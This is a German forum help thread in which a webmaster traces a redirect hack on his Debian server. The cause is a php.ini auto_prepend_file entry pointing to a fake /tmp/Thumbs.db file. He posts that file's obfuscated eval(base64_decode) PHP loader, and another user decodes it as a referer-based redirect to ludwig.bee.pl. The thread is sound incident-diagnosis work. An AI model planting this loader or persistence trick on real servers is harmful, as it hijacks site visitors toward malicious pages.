Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Gesamter Traffic von extern auf finditnow.osa.pl weitergeleitet - wurm- wie entfernen?

Frage Internet Server

Mitglied: Benni88

Benni88 (Level 1) - Jetzt verbinden

30.05.2011, aktualisiert 15:38 Uhr, 4430 Aufrufe, 10 Kommentare

Durch einen Hack in einer Lücke bei Wordpress bin ich Opfer von einem hack geworden.
Ich habe schon einiges probiert bekomme ihn aber leider nicht komplett entfernt und hoffe das man mir hier helfen kann.

Liebe User,

ich bin "Opfer" eines Hackangriffes geworden.
Ich bin selbst Schuld, denn ich hatte ein veraltetes Wordpress auf meinem Server, über den dieser Hack eingeschleust wurde.
http://www.faires-marketing.de/finditnow-osa-pl-hack-unerwunschte-umlei ...

Habe viele Seiten und Foren durchgeforscht, aber mein Problm wurde dadurch leider nicht behoben.

Ein Beispiel:
Geht auf http://www.google.de - gibt dort "lolrofl" ein - lolrofl.net ist meine Seite. klickt ihr den Link nun über google an, kommt ihr auf http://finditnow.osa.pl/atp/?said=3333g&q=lolrofl - und das ist bei all meinen Webseiten so. Auch wenn ein klick über Facebook, Gmail o.ä. kommt auf meine Seiten, wird er auf diese Seite weitergeleitet. (Auch bei Seiten ohne Wordpress)

Ich habe schon alles unternommen, was auf den Webseiten gesagt wird.
Es gibt bei mir keine Dateien mehr, die diesen "Schadcode" in sich haben, die auf finditnow.osa.pl weiterleiten.

Ich habe testweise Dateien erstellt, ohne Inhalt, und habe diese dann über Google und Facebook aufgerufen, und das gleiche Spiel, ich werde auf die Malware Seite weiter geleitet. Obwohl nichts in der Datei drin steht. Auch ist in dem Ordner der Webseite keine .htaccess File.

Ich weiß einfach nicht mehr wo ich suchen soll und woran es liegen kann das es immer noch bei allen Seiten mit .php so ist.

Habt ihr noch eine Idee, wo sich dieser Wurm vergraben hat das ich ihn nicht finde oder was ich machen kann?

Ich danke euch schonmal, ich sitze schon seit Samstag dran und ich habe auch schon eine Firma beauftragt, aber selbst die tapt weiterhin im dunkeln.

Dankeschonmal!

Liebe Grüße,
Benni
Mitglied: nikoatit
30.05.2011 um 15:37 Uhr
"Liebe User vom Debianforum.de,"?
Glaube du bist erst mal im falschen Forum!
Bitte warten ..
Mitglied: Benni88
30.05.2011 um 15:39 Uhr
Zitat von nikoatit:
"Liebe User vom Debianforum.de,"?
Glaube du bist erst mal im falschen Forum!

Verschrieben! Sorry
Bitte warten ..
Mitglied: Phalanx82
30.05.2011 um 15:49 Uhr
Ehrliche Antwort?

Wichtige Daten sichern -> Rechner platt machen!
Das ist der einzigst halbwegs sichere Weg, den Rechner auch wirklich
von Schadsoftware zu befreien. Wenn man ganz paranoid ist, kann man
auch noch das Cmos clearen, das Bios neu aufflashen, die Ram Bausteine
ausbauen, ein paar Stunden liegen lassen und danach die Contakte alle kurzschließen...
Und die Festplatte an einem sauberen PC mit Live-CD wipen.


Ganz ehrlich,

Du weißt nicht ob nun ausschließlich dieser Wurm (oder was auch immer) auf deinem
System herum geistert und wo er sich überall versteckt hat, ggf. Windows Daten
manipuliert und vor allem ggf. weitere Schadsoftware nachgeladen hat.

Daher rate ich dir, wie jedem anderen auch der Opfer von Viren/Würmern/Trojanern
geworden ist, ohne das der Virenwächter (falls vorhanden) Alarm geschlagen hat:

Backup der wichtigen Daten und Kiste neu machen. Damit tust du Dir, vor allem deinem
Gewissen einen Gefallen, denn du kannst danach sicher sein das dein Rechner sauber ist.
Und vor allem tust du auch anderen einen Gefallen wenn du den Rechner platt machst,
denn du wirst somit u.U. nicht selbst noch zur Virenschleuder die anderen Leuten die
Rechner verbiegt.


Mfg.
Bitte warten ..
Mitglied: Benni88
30.05.2011 um 15:53 Uhr
Zitat von Phalanx82:
Ehrliche Antwort?

Wichtige Daten sichern -> Rechner platt machen!
Das ist der einzigst halbwegs sichere Weg, den Rechner auch wirklich
von Schadsoftware zu befreien. Wenn man ganz paranoid ist, kann man
auch noch das Cmos clearen, das Bios neu aufflashen, die Ram Bausteine
ausbauen, ein paar Stunden liegen lassen und danach die Contakte alle kurzschließen...
Und die Festplatte an einem sauberen PC mit Live-CD wipen.


Ganz ehrlich,

Du weißt nicht ob nun ausschließlich dieser Wurm (oder was auch immer) auf deinem
System herum geistert und wo er sich überall versteckt hat, ggf. Windows Daten
manipuliert und vor allem ggf. weitere Schadsoftware nachgeladen hat.

Daher rate ich dir, wie jedem anderen auch der Opfer von Viren/Würmern/Trojanern
geworden ist, ohne das der Virenwächter (falls vorhanden) Alarm geschlagen hat:

Backup der wichtigen Daten und Kiste neu machen. Damit tust du Dir, vor allem deinem
Gewissen einen Gefallen, denn du kannst danach sicher sein das dein Rechner sauber ist.
Und vor allem tust du auch anderen einen Gefallen wenn du den Rechner platt machst,
denn du wirst somit u.U. nicht selbst noch zur Virenschleuder die anderen Leuten die
Rechner verbiegt.


Mfg.

Danke für die Antwort, aber es handelt sich um einen Debian Webserver
Bitte warten ..
Mitglied: nikoatit
30.05.2011 um 15:55 Uhr
Und wenn du es noch etwas sicherer haben willst, dann könntest du die Platte sogar mit einem Tool wie dban komplett mit Nullen (oder Einsen) überschreiben.
Oder du nimmst gleich eine neue Platte, dann ist es sicher, dass sich kein Kein Schädling in einem verstecken Bereich breitgemacht hat.
Bitte warten ..
Mitglied: m3adow
30.05.2011 um 15:59 Uhr
Ist das Problem nur bei Wordpress oder allgemein auf deinem Webserver?

Wenn es nur bei Wordpress ist, würde ich die Datenbank nach entsprechenden Einträgen durchsuchen, alle Ersetzen, WP plattmachen und inklusive Plugins neu installieren und konfigurieren.
Bitte warten ..
Mitglied: Benni88
30.05.2011 um 17:29 Uhr
Zitat von m3adow:
Ist das Problem nur bei Wordpress oder allgemein auf deinem Webserver?

Wenn es nur bei Wordpress ist, würde ich die Datenbank nach entsprechenden Einträgen durchsuchen, alle Ersetzen, WP
plattmachen und inklusive Plugins neu installieren und konfigurieren.


Nicht nur Wordpress Dateien. Alle .php Dateien tun dies, wenn über einen Ref diese PHP File geöffnet wird
Bitte warten ..
Mitglied: Lochkartenstanzer
31.05.2011 um 07:47 Uhr
Zitat von Benni88:

Danke für die Antwort, aber es handelt sich um einen Debian Webserver

Die Aussagen gelten für debian genauso wie für Windows, BSD, Solaris, DOS, ...
Bitte warten ..
Mitglied: Benni88
31.05.2011 um 08:35 Uhr
gefunden!

]; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file =/tmp/Thumbs.db

cat /tmp/Thumbs.db
<?php @eval(base64_decode("DQoNCmVycm9yX3JlcG9ydGluZygwKTsNCiRuY2N2PWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkbmNjdil7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQoNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJhb2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0d2l0dGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbHVkd2lnLmJlZS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0=")); ?>
Bitte warten ..
Mitglied: Phalanx82
31.05.2011 um 12:04 Uhr
Na das sieht mir doch schonmal verdächtig aus.

Hier mal der Inhalt der Base64 Codierung:

01.
zö¥m«ë‡^r‡^ 
02.
 
03.
error_reporting(0); 
04.
$nccv=headers_sent(); 
05.
if (!$nccv){ 
06.
$referer=$_SERVER['HTTP_REFERER']; 
07.
 
08.
if (stristr($referer,"aol") or stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) { 
09.
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		 
10.
		header("Location: http://ludwig.bee.pl/"); 
11.
		exit(); 
12.
13.
14.
}
Das sieht mir eindeutig nach Schädlingsbefall aus.

Mfg.
Bitte warten ..
Neuester Wissensbeitrag
Windows 10

Powershell 5 BSOD

(8)

Tipp von agowa338 zum Thema Windows 10 ...

Ähnliche Inhalte
Heiß diskutierte Inhalte
Microsoft
Ordner mit LW-Buchstaben versehen und benennen (20)

Frage von Xaero1982 zum Thema Microsoft ...

Outlook & Mail
gelöst Outlook 2010 findet ost datei nicht (19)

Frage von Floh21 zum Thema Outlook & Mail ...

Netzwerkmanagement
gelöst Anregungen, kleiner Betrieb, IT-Umgebung (18)

Frage von Unwichtig zum Thema Netzwerkmanagement ...

Festplatten, SSD, Raid
M.2 SSD wird nicht erkannt (14)

Frage von uridium69 zum Thema Festplatten, SSD, Raid ...